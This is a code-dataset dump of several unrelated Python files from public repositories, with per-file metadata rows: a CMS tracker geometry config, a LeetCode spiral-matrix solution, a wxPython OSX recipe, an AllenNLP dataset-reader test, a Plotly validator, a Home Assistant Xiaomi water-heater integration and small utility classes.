] | permissive | cms-sw/cmssw | 4ecd2c1105d59c66d385551230542c6615b9ab58 | 19c178740257eb48367778593da55dcad08b7a4f | refs/heads/master | 2023-08-23T21:57:42.491143 | 2023-08-22T20:22:40 | 2023-08-22T20:22:40 | 10,969,551 | 1,006 | 3,696 | Apache-2.0 | 2023-09-14T19:14:28 | 2013-06-26T14:09:07 | C++ | UTF-8 | Python | false | false | 11,280 | py | import FWCore.ParameterSet.Config as cms
XMLIdealGeometryESSource = cms.ESSource("XMLIdealGeometryESSource",
geomXMLFiles = cms.vstring('Geometry/CMSCommonData/data/materials.xml',
'Geometry/CMSCommonData/data/rotations.xml',
'Geometry/CMSCommonData/data/normal/cmsextent.xml',
'Geometry/CMSCommonData/data/cms.xml',
'Geometry/CMSCommonData/data/cmsMother.xml',
'Geometry/CMSCommonData/data/cmsTracker.xml',
'Geometry/TrackerCommonData/data/pixfwdMaterials.xml',
'Geometry/TrackerCommonData/data/pixfwdCommon.xml',
'Geometry/TrackerCommonData/data/pixfwdPlaq.xml',
'Geometry/TrackerCommonData/data/pixfwdPlaq1x2.xml',
'Geometry/TrackerCommonData/data/pixfwdPlaq1x5.xml',
'Geometry/TrackerCommonData/data/pixfwdPlaq2x3.xml',
'Geometry/TrackerCommonData/data/pixfwdPlaq2x4.xml',
'Geometry/TrackerCommonData/data/pixfwdPlaq2x5.xml',
'Geometry/TrackerCommonData/data/pixfwdPanelBase.xml',
'Geometry/TrackerCommonData/data/pixfwdPanel.xml',
'Geometry/TrackerCommonData/data/pixfwdBlade.xml',
'Geometry/TrackerCommonData/data/pixfwdNipple.xml',
'Geometry/TrackerCommonData/data/pixfwdDisk.xml',
'Geometry/TrackerCommonData/data/pixfwdCylinder.xml',
'Geometry/TrackerCommonData/data/pixfwd.xml',
'Geometry/TrackerCommonData/data/pixbarmaterial.xml',
'Geometry/TrackerCommonData/data/pixbarladder.xml',
'Geometry/TrackerCommonData/data/pixbarladderfull.xml',
'Geometry/TrackerCommonData/data/pixbarladderhalf.xml',
'Geometry/TrackerCommonData/data/pixbarlayer.xml',
'Geometry/TrackerCommonData/data/pixbarlayer0.xml',
'Geometry/TrackerCommonData/data/pixbarlayer1.xml',
'Geometry/TrackerCommonData/data/pixbarlayer2.xml',
'Geometry/TrackerCommonData/data/pixbar.xml',
'Geometry/TrackerCommonData/data/tibtidcommonmaterial.xml',
'Geometry/TrackerCommonData/data/tibmaterial.xml',
'Geometry/TrackerCommonData/data/tibmodpar.xml',
'Geometry/TrackerCommonData/data/tibmodule0.xml',
'Geometry/TrackerCommonData/data/tibmodule0a.xml',
'Geometry/TrackerCommonData/data/tibmodule0b.xml',
'Geometry/TrackerCommonData/data/tibmodule2.xml',
'Geometry/TrackerCommonData/data/tibstringpar.xml',
'Geometry/TrackerCommonData/data/tibstring0ll.xml',
'Geometry/TrackerCommonData/data/tibstring0lr.xml',
'Geometry/TrackerCommonData/data/tibstring0ul.xml',
'Geometry/TrackerCommonData/data/tibstring0ur.xml',
'Geometry/TrackerCommonData/data/tibstring0.xml',
'Geometry/TrackerCommonData/data/tibstring1ll.xml',
'Geometry/TrackerCommonData/data/tibstring1lr.xml',
'Geometry/TrackerCommonData/data/tibstring1ul.xml',
'Geometry/TrackerCommonData/data/tibstring1ur.xml',
'Geometry/TrackerCommonData/data/tibstring1.xml',
'Geometry/TrackerCommonData/data/tibstring2ll.xml',
'Geometry/TrackerCommonData/data/tibstring2lr.xml',
'Geometry/TrackerCommonData/data/tibstring2ul.xml',
'Geometry/TrackerCommonData/data/tibstring2ur.xml',
'Geometry/TrackerCommonData/data/tibstring2.xml',
'Geometry/TrackerCommonData/data/tibstring3ll.xml',
'Geometry/TrackerCommonData/data/tibstring3lr.xml',
'Geometry/TrackerCommonData/data/tibstring3ul.xml',
'Geometry/TrackerCommonData/data/tibstring3ur.xml',
'Geometry/TrackerCommonData/data/tibstring3.xml',
'Geometry/TrackerCommonData/data/tiblayerpar.xml',
'Geometry/TrackerCommonData/data/tiblayer0.xml',
'Geometry/TrackerCommonData/data/tiblayer1.xml',
'Geometry/TrackerCommonData/data/tiblayer2.xml',
'Geometry/TrackerCommonData/data/tiblayer3.xml',
'Geometry/TrackerCommonData/data/tib.xml',
'Geometry/TrackerCommonData/data/tidmaterial.xml',
'Geometry/TrackerCommonData/data/tidmodpar.xml',
'Geometry/TrackerCommonData/data/tidmodule0.xml',
'Geometry/TrackerCommonData/data/tidmodule0r.xml',
'Geometry/TrackerCommonData/data/tidmodule0l.xml',
'Geometry/TrackerCommonData/data/tidmodule1.xml',
'Geometry/TrackerCommonData/data/tidmodule1r.xml',
'Geometry/TrackerCommonData/data/tidmodule1l.xml',
'Geometry/TrackerCommonData/data/tidmodule2.xml',
'Geometry/TrackerCommonData/data/tidringpar.xml',
'Geometry/TrackerCommonData/data/tidring0.xml',
'Geometry/TrackerCommonData/data/tidring0f.xml',
'Geometry/TrackerCommonData/data/tidring0b.xml',
'Geometry/TrackerCommonData/data/tidring1.xml',
'Geometry/TrackerCommonData/data/tidring1f.xml',
'Geometry/TrackerCommonData/data/tidring1b.xml',
'Geometry/TrackerCommonData/data/tidring2.xml',
'Geometry/TrackerCommonData/data/tid.xml',
'Geometry/TrackerCommonData/data/tidf.xml',
'Geometry/TrackerCommonData/data/tidb.xml',
'Geometry/TrackerCommonData/data/tibtidservices.xml',
'Geometry/TrackerCommonData/data/tibtidservicesf.xml',
'Geometry/TrackerCommonData/data/tibtidservicesb.xml',
'Geometry/TrackerCommonData/data/tobmaterial.xml',
'Geometry/TrackerCommonData/data/tobmodpar.xml',
'Geometry/TrackerCommonData/data/tobmodule0.xml',
'Geometry/TrackerCommonData/data/tobmodule2.xml',
'Geometry/TrackerCommonData/data/tobmodule4.xml',
'Geometry/TrackerCommonData/data/tobrodpar.xml',
'Geometry/TrackerCommonData/data/tobrod0c.xml',
'Geometry/TrackerCommonData/data/tobrod0l.xml',
'Geometry/TrackerCommonData/data/tobrod0h.xml',
'Geometry/TrackerCommonData/data/tobrod0.xml',
'Geometry/TrackerCommonData/data/tobrod1l.xml',
'Geometry/TrackerCommonData/data/tobrod1h.xml',
'Geometry/TrackerCommonData/data/tobrod1.xml',
'Geometry/TrackerCommonData/data/tobrod2c.xml',
'Geometry/TrackerCommonData/data/tobrod2l.xml',
'Geometry/TrackerCommonData/data/tobrod2h.xml',
'Geometry/TrackerCommonData/data/tobrod2.xml',
'Geometry/TrackerCommonData/data/tobrod3l.xml',
'Geometry/TrackerCommonData/data/tobrod3h.xml',
'Geometry/TrackerCommonData/data/tobrod3.xml',
'Geometry/TrackerCommonData/data/tobrod4c.xml',
'Geometry/TrackerCommonData/data/tobrod4l.xml',
'Geometry/TrackerCommonData/data/tobrod4h.xml',
'Geometry/TrackerCommonData/data/tobrod4.xml',
'Geometry/TrackerCommonData/data/tobrod5l.xml',
'Geometry/TrackerCommonData/data/tobrod5h.xml',
'Geometry/TrackerCommonData/data/tobrod5.xml',
'Geometry/TrackerCommonData/data/tob.xml',
'Geometry/TrackerCommonData/data/tecmaterial.xml',
'Geometry/TrackerCommonData/data/tecmodpar.xml',
'Geometry/TrackerCommonData/data/tecmodule0.xml',
'Geometry/TrackerCommonData/data/tecmodule0r.xml',
'Geometry/TrackerCommonData/data/tecmodule0s.xml',
'Geometry/TrackerCommonData/data/tecmodule1.xml',
'Geometry/TrackerCommonData/data/tecmodule1r.xml',
'Geometry/TrackerCommonData/data/tecmodule1s.xml',
'Geometry/TrackerCommonData/data/tecmodule2.xml',
'Geometry/TrackerCommonData/data/tecmodule3.xml',
'Geometry/TrackerCommonData/data/tecmodule4.xml',
'Geometry/TrackerCommonData/data/tecmodule4r.xml',
'Geometry/TrackerCommonData/data/tecmodule4s.xml',
'Geometry/TrackerCommonData/data/tecmodule5.xml',
'Geometry/TrackerCommonData/data/tecmodule6.xml',
'Geometry/TrackerCommonData/data/tecpetpar.xml',
'Geometry/TrackerCommonData/data/tecring0.xml',
'Geometry/TrackerCommonData/data/tecring1.xml',
'Geometry/TrackerCommonData/data/tecring2.xml',
'Geometry/TrackerCommonData/data/tecring3.xml',
'Geometry/TrackerCommonData/data/tecring4.xml',
'Geometry/TrackerCommonData/data/tecring5.xml',
'Geometry/TrackerCommonData/data/tecring6.xml',
'Geometry/TrackerCommonData/data/tecring0f.xml',
'Geometry/TrackerCommonData/data/tecring1f.xml',
'Geometry/TrackerCommonData/data/tecring2f.xml',
'Geometry/TrackerCommonData/data/tecring3f.xml',
'Geometry/TrackerCommonData/data/tecring4f.xml',
'Geometry/TrackerCommonData/data/tecring5f.xml',
'Geometry/TrackerCommonData/data/tecring6f.xml',
'Geometry/TrackerCommonData/data/tecring0b.xml',
'Geometry/TrackerCommonData/data/tecring1b.xml',
'Geometry/TrackerCommonData/data/tecring2b.xml',
'Geometry/TrackerCommonData/data/tecring3b.xml',
'Geometry/TrackerCommonData/data/tecring4b.xml',
'Geometry/TrackerCommonData/data/tecring5b.xml',
'Geometry/TrackerCommonData/data/tecring6b.xml',
'Geometry/TrackerCommonData/data/tecpetalf.xml',
'Geometry/TrackerCommonData/data/tecpetalb.xml',
'Geometry/TrackerCommonData/data/tecpetal0.xml',
'Geometry/TrackerCommonData/data/tecpetal0f.xml',
'Geometry/TrackerCommonData/data/tecpetal0b.xml',
'Geometry/TrackerCommonData/data/tecpetal3.xml',
'Geometry/TrackerCommonData/data/tecpetal3f.xml',
'Geometry/TrackerCommonData/data/tecpetal3b.xml',
'Geometry/TrackerCommonData/data/tecpetal6f.xml',
'Geometry/TrackerCommonData/data/tecpetal6b.xml',
'Geometry/TrackerCommonData/data/tecpetal8f.xml',
'Geometry/TrackerCommonData/data/tecpetal8b.xml',
'Geometry/TrackerCommonData/data/tecwheel.xml',
'Geometry/TrackerCommonData/data/tecwheela.xml',
'Geometry/TrackerCommonData/data/tecwheelb.xml',
'Geometry/TrackerCommonData/data/tecwheelc.xml',
'Geometry/TrackerCommonData/data/tecwheeld.xml',
'Geometry/TrackerCommonData/data/tecwheel6.xml',
'Geometry/TrackerCommonData/data/tecservices.xml',
'Geometry/TrackerCommonData/data/tecbackplate.xml',
'Geometry/TrackerCommonData/data/tec.xml',
'Geometry/TrackerCommonData/data/trackermaterial.xml',
'Geometry/TrackerCommonData/data/tracker.xml',
'Geometry/TrackerCommonData/data/trackerpixbar.xml',
'Geometry/TrackerCommonData/data/trackerpixfwd.xml',
'Geometry/TrackerCommonData/data/trackertib.xml',
'Geometry/TrackerCommonData/data/trackertid.xml',
'Geometry/TrackerCommonData/data/trackertibtidservices.xml',
'Geometry/TrackerCommonData/data/trackertob.xml',
'Geometry/TrackerCommonData/data/trackertec.xml',
'Geometry/TrackerCommonData/data/trackerbulkhead.xml',
'Geometry/TrackerCommonData/data/trackerother.xml',
'Geometry/TrackerCommonData/data/trackerStructureTopology.xml',
'Geometry/TrackerSimData/data/trackersens.xml',
'Geometry/TrackerRecoData/data/trackerRecoMaterial.xml',
'Geometry/TrackerSimData/data/trackerProdCuts.xml'),
rootNodeName = cms.string('tracker:Tracker')
)
| [
"[email protected]"
] | |
8a90607f501666c4167d56b1318788ad7de2622b | 112882b8d6c5071e7d2610c595bfca9210c79a0a | /Python/leetcode.059.spiral-matrix-ii.py | e94e966ba8a1993a1e5de4cb00dc0482783c04d3 | [
"MIT"
] | permissive | tedye/leetcode | 193b1900d98e35d5c402013cbe3bc993d0235da2 | 975d7e3b8cb9b6be9e80e07febf4bcf6414acd46 | refs/heads/master | 2021-01-01T19:06:06.408135 | 2015-10-24T06:44:40 | 2015-10-24T06:44:40 | 41,804,923 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | class Solution(object):
def generateMatrix(self, n):
"""
:type n: int
:rtype: List[List[int]]
"""
if n <= 0:
return []
if n == 1:
return [[1]]
matrix = [[None] * n for _ in range(n)]
x = y = 0
direction = [(0,1),(1,0),(0,-1),(-1,0)]
count = 1
l = 0
r = n-1
u = 0
d = n-1
dc = 0
while l <= r or u <= d:
if l <= x <= r and u <= y <= d:
matrix[y][x] = count
count += 1
y += direction[dc&3][0]
x += direction[dc&3][1]
elif x > r:
u += 1
x -= 1
y += 1
dc += 1
elif y > d:
r -= 1
y -= 1
x -= 1
dc +=1
elif x < l:
d -= 1
x += 1
y -= 1
dc += 1
elif y < u:
l += 1
y += 1
x += 1
dc += 1
return matrix | [
"[email protected]"
] | |
15900d19d8a64750afdcbbffb1afc39a78fc04ed | 4c8152b5abdefa8fe44cb4a423985b18a3175542 | /Books/wxpython-28-application-development-cookbook/1780_Code/1780_12_Code/05/osxapp.py | b79b77118dfeb20192ff0a56c1e0a769787b40e0 | [] | no_license | mcmoralesr/Learning.Python | c5ed943a1e4eed774c1b626c52c450b48c1062b6 | 8ea6222d260989c6973d9a0cc494ff659a78ade6 | refs/heads/master | 2020-06-28T04:22:53.970613 | 2015-02-12T10:23:28 | 2015-02-12T10:23:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,765 | py | # Chapter 12: Application Infrastructure,
# Building and Managing Applications for Distribution
# Recipe 5: Optimizing for OSX
#
import wx
import sys
class OSXApp(wx.App):
def OnInit(self):
# Enable native spell checking and right
# click menu for Mac TextCtrl's
if wx.Platform == '__WXMAC__':
spellcheck = "mac.textcontrol-use-spell-checker"
wx.SystemOptions.SetOptionInt(spellcheck, 1)
self.frame = OSXFrame(None,
title="Optimize for OSX")
self.frame.Show()
return True
def MacReopenApp(self):
self.GetTopWindow().Raise()
class OSXFrame(wx.Frame):
"""Main application window"""
def __init__(self, *args, **kwargs):
super(OSXFrame, self).__init__(*args, **kwargs)
# Attributes
self.textctrl = wx.TextCtrl(self,
style=wx.TE_MULTILINE)
# Setup Menus
mb = wx.MenuBar()
fmenu = wx.Menu()
fmenu.Append(wx.ID_OPEN)
fmenu.Append(wx.ID_EXIT)
mb.Append(fmenu, "&File")
emenu = wx.Menu()
emenu.Append(wx.ID_COPY)
emenu.Append(wx.ID_PREFERENCES)
mb.Append(emenu, "&Edit")
hmenu = wx.Menu()
hmenu.Append(wx.NewId(), "&Online Help...")
hmenu.Append(wx.ID_ABOUT, "&About...")
mb.Append(hmenu, "&Help")
if wx.Platform == '__WXMAC__':
# Make sure we don't get duplicate
# Help menu since we used non standard name
app = wx.GetApp()
app.SetMacHelpMenuTitleName("&Help")
self.SetMenuBar(mb)
self.SetInitialSize()
if __name__ == '__main__':
app = OSXApp(False)
app.MainLoop()
| [
"[email protected]"
] | |
3ed8cf2c724d861b36c3e9fce3019c5683c8331a | 27089ed5ea5f81949a6d62d08465ed92d9194fdd | /allennlp/tests/data/dataset_readers/universal_dependencies_multilingual_dataset_reader_test.py | 8bf51a05a0ccc44176c39258c653be1662a0c991 | [
"Apache-2.0"
] | permissive | Whu-wxy/allennlp | 5c87bd0916cfea51ce7ceef45b9363579d19b670 | c863900e3e1fe7be540b9a0632a7a032491fc3ab | refs/heads/master | 2021-06-27T19:34:04.720649 | 2019-09-10T15:21:40 | 2019-09-10T15:21:40 | 168,892,873 | 6 | 3 | Apache-2.0 | 2019-08-20T13:08:37 | 2019-02-03T00:17:13 | Python | UTF-8 | Python | false | false | 6,961 | py | # pylint: disable=no-self-use,invalid-name
from allennlp.data.dataset_readers import UniversalDependenciesMultiLangDatasetReader
from allennlp.common.testing import AllenNlpTestCase
class TestUniversalDependenciesMultilangDatasetReader(AllenNlpTestCase):
data_path = AllenNlpTestCase.FIXTURES_ROOT / "data" / "dependencies_multilang" / "*"
def check_two_instances(self, instance1, instance2):
fields1, fields2 = instance1.fields, instance2.fields
assert fields1['metadata'].metadata['lang'] == fields2['metadata'].metadata['lang']
lang = fields1['metadata'].metadata['lang']
if lang == 'fr':
assert fields1['metadata'].metadata['lang'] == 'fr'
assert [t.text for t in fields1["words"].tokens] == ['Ses', 'habitants', 'sont', 'appelés', 'les',
'Paydrets',
'et', 'les', 'Paydrètes', ';']
assert fields1["pos_tags"].labels == ['DET', 'NOUN', 'VERB', 'VERB', 'DET',
'NOUN', 'CONJ', 'DET', 'NOUN', '.']
assert fields1["head_tags"].labels == ['poss', 'nsubjpass', 'auxpass', 'ROOT', 'det', 'attr',
'cc', 'det', 'conj', 'p']
assert fields1["head_indices"].labels == [2, 4, 4, 0, 6, 4, 6, 9, 6, 4]
assert fields2['metadata'].metadata['lang'] == 'fr'
assert [t.text for t in fields2["words"].tokens] == ['Cette', 'tour', 'de', 'a',
'été', 'achevée', 'en', '1962', '.']
assert fields2["pos_tags"].labels == ['DET', 'NOUN', 'ADP', 'VERB', 'VERB',
'VERB', 'ADP', 'NUM', '.']
assert fields2["head_tags"].labels == ['det', 'nsubjpass', 'adpmod', 'aux', 'auxpass', 'ROOT',
'adpmod', 'adpobj', 'p']
assert fields2["head_indices"].labels == [2, 6, 2, 6, 6, 0, 6, 7, 6]
elif lang == 'es':
assert [t.text for t in fields1["words"].tokens] == ['Aclarando', 'hacia', 'todo', 'el', 'mundo',
'Valderrama', 'Y', 'Eduardo', 'Son', 'La',
'Misma', 'Persona', '.']
assert fields1["pos_tags"].labels == ['VERB', 'ADP', 'DET', 'DET', 'NOUN', 'NOUN', 'CONJ',
'NOUN', 'NOUN', 'DET', 'ADJ', 'NOUN', '.']
assert fields1["head_tags"].labels == ['ROOT', 'adpmod', 'det', 'det', 'adpobj', 'nsubj', 'cc', 'conj',
'xcomp',
'det', 'amod', 'attr', 'p']
assert fields1["head_indices"].labels == [0, 1, 5, 5, 2, 9, 6, 6, 1, 12, 12, 9, 1]
assert [t.text for t in fields2["words"].tokens] == ['Es', 'un', 'bar', 'disfrazado', 'de',
'restaurante', 'la', 'comida', 'esta',
'demasiado', 'salada', '.']
assert fields2["pos_tags"].labels == ['VERB', 'DET', 'NOUN', 'VERB', 'ADP', 'NOUN',
'DET', 'NOUN', 'VERB', 'PRON', 'ADJ', '.']
assert fields2["head_tags"].labels == ['ROOT', 'det', 'attr', 'partmod', 'adpmod', 'adpobj',
'det', 'nsubj', 'parataxis', 'nmod', 'acomp', 'p']
assert fields2["head_indices"].labels == [0, 3, 1, 3, 4, 5, 8, 9, 1, 11, 9, 1]
elif lang == 'it':
assert fields1['metadata'].metadata['lang'] == 'it'
assert [t.text for t in fields1["words"].tokens] == ['Inconsueto', 'allarme', 'alla', 'Tate',
'Gallery', ':']
assert fields1["pos_tags"].labels == ['ADJ', 'NOUN', 'ADP', 'NOUN', 'NOUN', '.']
assert fields1["head_tags"].labels == ['amod', 'ROOT', 'adpmod', 'dep', 'adpobj', 'p']
assert fields1["head_indices"].labels == [2, 0, 2, 5, 3, 2]
assert fields2['metadata'].metadata['lang'] == 'it'
assert [t.text for t in fields2["words"].tokens] == ['Hamad', 'Butt', 'è', 'morto', 'nel', '1994',
'a', '32', 'anni', '.']
assert fields2["pos_tags"].labels == ['NOUN', 'NOUN', 'VERB', 'VERB', 'ADP',
'NUM', 'ADP', 'NUM', 'NOUN', '.']
assert fields2["head_tags"].labels == ['dep', 'nsubj', 'aux', 'ROOT', 'adpmod', 'adpobj',
'adpmod', 'num', 'adpobj', 'p']
assert fields2["head_indices"].labels == [2, 4, 4, 0, 4, 5, 4, 9, 7, 4]
return lang
def test_iterate_once_per_file_when_first_pass_for_vocab_is_true(self):
reader = UniversalDependenciesMultiLangDatasetReader(
languages=['es', 'fr', 'it'], is_first_pass_for_vocab=True)
instances = list(reader.read(str(self.data_path)))
assert len(instances) == 6
processed_langs = []
processed_langs.append(self.check_two_instances(instances[0], instances[1]))
processed_langs.append(self.check_two_instances(instances[2], instances[3]))
processed_langs.append(self.check_two_instances(instances[4], instances[5]))
assert 'es' in processed_langs and 'fr' in processed_langs and 'it' in processed_langs
def test_iterate_forever_when_first_pass_for_vocab_is_false(self):
'''
Note: assumes that each data file contains no more than 20 trees.
'''
reader = UniversalDependenciesMultiLangDatasetReader(languages=['es', 'fr', 'it'],
is_first_pass_for_vocab=False,
instances_per_file=1,
lazy=True)
counter_es, counter_fr, counter_it = 0, 0, 0
for instance in reader.read(str(self.data_path)):
lang = instance.fields['metadata'].metadata['lang']
if lang == 'es':
counter_es += 1
if counter_es > 20:
break
if lang == 'fr':
counter_fr += 1
if counter_fr > 20:
break
if lang == 'it':
counter_it += 1
if counter_it > 20:
break
# Asserting that the reader didn't stop after reading the three files once.
assert (counter_es > 20 or counter_fr > 20 or counter_it > 20)
| [
"[email protected]"
] | |
f5b3c461ce5399f255d6a71987c9096f64d5f927 | a46d135ba8fd7bd40f0b7d7a96c72be446025719 | /packages/python/plotly/plotly/validators/histogram2dcontour/colorbar/_nticks.py | ed0d7d4831c51818983ca85921168266da541e9f | [
"MIT"
] | permissive | hugovk/plotly.py | 5e763fe96f225d964c4fcd1dea79dbefa50b4692 | cfad7862594b35965c0e000813bd7805e8494a5b | refs/heads/master | 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 | MIT | 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null | UTF-8 | Python | false | false | 471 | py | import _plotly_utils.basevalidators
class NticksValidator(_plotly_utils.basevalidators.IntegerValidator):
def __init__(
self, plotly_name="nticks", parent_name="histogram2dcontour.colorbar", **kwargs
):
super(NticksValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
min=kwargs.pop("min", 0),
**kwargs
)
| [
"[email protected]"
] | |
55c142fb77a38d5d16184d5d8309e2e0f55df2f5 | 7dd25a39d91d1f03791eeb2f39c8bdf825b24601 | /test/input/only_describe.py | d2fda863179b3b0133448712f18e512f546add7e | [] | no_license | rlgomes/pocha | a281736f35e6d53b0c56f5bca946bd494b0bb6cf | 8be091fcf73b57e8c7e9efe17e8452d639e18dd7 | refs/heads/master | 2022-09-18T19:34:56.991444 | 2019-06-03T14:26:09 | 2019-06-03T14:26:09 | 62,520,589 | 51 | 12 | null | 2022-07-06T19:22:06 | 2016-07-04T00:20:44 | Python | UTF-8 | Python | false | false | 326 | py | from pocha import describe, it
@describe('first describe')
def describe1():
@it('first it')
def _():
pass
@it('second it')
def _():
pass
@describe('second describe', only=True)
def describe1():
@it('third it')
def _():
pass
@it('fourth it')
def _():
pass
| [
"[email protected]"
] | |
d8a6a59cd6d3c2b41ee795ed6735211d1f58ba41 | 031d4491fcd2a9620e72710e000bae8afd92bbcb | /custom_components/xiaomi_miot_raw/water_heater.py | 733f78a5484764a0a2ca8a518fa2a35093cce782 | [
"Apache-2.0"
] | permissive | hzh-hzh/xiaomi_miot_raw | 76717aa4803cf4e006d39bc685fd225724692292 | 8f8de5cc6f0eeae55770ec08cb3ff9ebcb75c422 | refs/heads/master | 2023-07-12T19:13:11.206861 | 2021-08-13T14:46:31 | 2021-08-13T14:46:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,698 | py | import asyncio
import json
import logging
from collections import OrderedDict
from datetime import timedelta
from functools import partial
from typing import Optional
import async_timeout
import homeassistant.helpers.config_validation as cv
import voluptuous as vol
from aiohttp import ClientSession
from homeassistant.components import water_heater
from homeassistant.components.water_heater import (
SUPPORT_AWAY_MODE,
SUPPORT_OPERATION_MODE,
SUPPORT_TARGET_TEMPERATURE,
WaterHeaterEntity,
PLATFORM_SCHEMA,
)
from homeassistant.const import *
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers import aiohttp_client
from miio.exceptions import DeviceException
from .deps.miio_new import MiotDevice
import copy
from . import GenericMiotDevice, ToggleableMiotDevice, dev_info, async_generic_setup_platform
from .climate import MiotClimate
from .deps.const import (
DOMAIN,
CONF_UPDATE_INSTANT,
CONF_MAPPING,
CONF_CONTROL_PARAMS,
CONF_CLOUD,
CONF_MODEL,
ATTR_STATE_VALUE,
ATTR_MODEL,
ATTR_FIRMWARE_VERSION,
ATTR_HARDWARE_VERSION,
SCHEMA,
MAP,
DUMMY_IP,
DUMMY_TOKEN,
)
TYPE = 'water_heater'
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "Generic MIoT " + TYPE
DATA_KEY = TYPE + '.' + DOMAIN
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
SCHEMA
)
SCAN_INTERVAL = timedelta(seconds=10)
# pylint: disable=unused-argument
@asyncio.coroutine
async def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
await async_generic_setup_platform(
hass,
config,
async_add_devices,
discovery_info,
TYPE,
{'default': MiotWaterHeater},
)
async def async_setup_entry(hass, config_entry, async_add_entities):
config = hass.data[DOMAIN]['configs'].get(config_entry.entry_id, dict(config_entry.data))
await async_setup_platform(hass, config, async_add_entities)
async def async_unload_entry(hass, config_entry, async_add_entities):
return True
class MiotWaterHeater(ToggleableMiotDevice, WaterHeaterEntity):
def __init__(self, device, config, device_info, hass, main_mi_type):
ToggleableMiotDevice.__init__(self, device, config, device_info, hass, main_mi_type)
self._target_temperature = None
self._unit_of_measurement = TEMP_CELSIUS
self._away = None
self._current_operation = None
self._current_temperature = None
@property
def supported_features(self):
"""Return the list of supported features."""
s = SUPPORT_OPERATION_MODE
if self._did_prefix + 'target_temperature' in self._mapping:
s |= SUPPORT_TARGET_TEMPERATURE
return s
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return self._unit_of_measurement
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
return self._current_operation
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._target_temperature
@property
def min_temp(self):
"""Return the lowbound target temperature we try to reach."""
return self._ctrl_params['target_temperature']['value_range'][0]
@property
def max_temp(self):
"""Return the lowbound target temperature we try to reach."""
return self._ctrl_params['target_temperature']['value_range'][1]
@property
def current_temperature(self):
"""Return the current temperature."""
return self._current_temperature
@property
def operation_list(self):
"""Return the list of available operation modes."""
return (["on","off"] if self._did_prefix + 'switch_status' in self._mapping else []) + (list(self._ctrl_params['mode'].keys()) if 'mode' in self._ctrl_params else [])
async def async_set_temperature(self, **kwargs):
"""Set new target temperatures."""
if kwargs.get(ATTR_TEMPERATURE) is not None:
result = await self.set_property_new(self._did_prefix + "target_temperature", kwargs.get(ATTR_TEMPERATURE))
if result:
self._target_temperature = kwargs.get(ATTR_TEMPERATURE)
self.async_write_ha_state()
async def async_set_operation_mode(self, operation_mode):
"""Set new operation mode."""
if operation_mode == 'on':
await self.async_turn_on()
if self._state == True:
self._current_operation = 'on'
elif operation_mode == 'off':
await self.async_turn_off()
if self._state == False:
self._current_operation = 'off'
else:
result = await self.set_property_new(self._did_prefix + "mode", self._ctrl_params['mode'][operation_mode])
if result:
self._current_operation = operation_mode
self.async_write_ha_state()
def _handle_platform_specific_attrs(self):
super()._handle_platform_specific_attrs()
try:
self._target_temperature = self._state_attrs.get(self._did_prefix + 'target_temperature')
except:
pass
try:
self._current_temperature = self._state_attrs.get(self._did_prefix + 'temperature')
except:
pass
try:
o = self._state_attrs.get(self._did_prefix + 'mode')
if o in ('on','off'):
self._current_operation = o
elif o is not None:
self.get_key_by_value(self._ctrl_params['mode'], o)
except:
pass
| [
"[email protected]"
] | |
c238b36926219fbf87c188545260cdff53b761e8 | 4e8674d7c83254aba7f2d327f16d5ad202a189b6 | /src/select_centered_text.py | b072d911fa1e942f3c5aedc591f19b9b7d3468da | [] | no_license | raysmith619/dots | 0f5e34b17675cfb0903a20eda86493d37676b500 | c44ff3ebf57ec73c6fd8b7898cbc186668f83915 | refs/heads/master | 2021-06-17T02:34:48.850425 | 2021-04-27T13:54:24 | 2021-04-27T13:54:24 | 205,397,035 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,376 | py | # select_centered_text.py
""" Centered Text near/within Part
"""
from pip._vendor.distlib import resources
from PIL._imaging import display
class CenteredText:
""" Contents for text placed inside a region
"""
def __init__(self, part, text, x=None, y=None,
font_name=None,
color=None, color_bg=None,
height=None, width=None):
""" Setup instance of centered text
:part: in which centered text is placed
:text: text string to place
:font: font name
"""
self.part = part
self.text = text
self.x = x
self.y = y
self.font_name = font_name
self.color = color
self.color_bg = color_bg
self.height = height
self.width = width
self.text_tag = None # Canvas text tag, if live
self.text_bg_tag = None # Canvas text background
self.image = None # http://effbot.org/pyfaq/why-do-my-tkinter-images-not-appear.htm
def __str__(self):
""" Centered Text description
"""
st = self.text
if self.x is not None or self.y is not None:
if self.x is None:
self.x = 0
if self.y is None:
self.y = 0
st += f" at:x={self.x} y={self.y}"
if self.font_name is not None:
st += f" font={self.font_name}"
if self.color is not None:
st += " %s" % self.color
if self.color_bg is not None:
st += " bg=%s" % self.color_bg
if self.height is not None:
st += " height=%d" % self.height
if self.width is not None:
st += " width=%d" % self.height
if self.text_tag is not None:
st += " text_tag=%d" % self.text_tag
return st
def delete(self):
""" Delete centered text resources
"""
if self.text_tag is not None:
self.part.sel_area.canvas.delete(self.text_tag)
self.text_tag = None
if self.text_bg_tag is not None:
self.part.sel_area.canvas.delete(self.text_bg_tag)
self.text_bg_tag = None
def destroy(self):
""" Remove object from display
"""
self.delete()
| [
"[email protected]"
] | |
7939e6ea94738d2a078b9885647f393ef60e84d9 | e982ad81d18e3a983756b4c90311b007b9d5e276 | /pyspec/cui/api.py | 6ff27e71232a9ebc13a3583cc49048a8f6fdffda | [
"MIT"
] | permissive | jyotijaya/pyspec | 2ca4428c3c9924154f7467edbdc1d8fddd59a817 | ae7a4de39beb3cf2e0838b6c3a9ef73d082445eb | refs/heads/master | 2022-12-27T20:42:15.818388 | 2020-10-01T11:50:19 | 2020-10-01T11:50:19 | 300,260,536 | 0 | 0 | NOASSERTION | 2020-10-01T11:49:40 | 2020-10-01T11:49:39 | null | UTF-8 | Python | false | false | 938 | py | # -*- coding: ascii -*-
"""PySpec extension api.
This module enable following extension features:
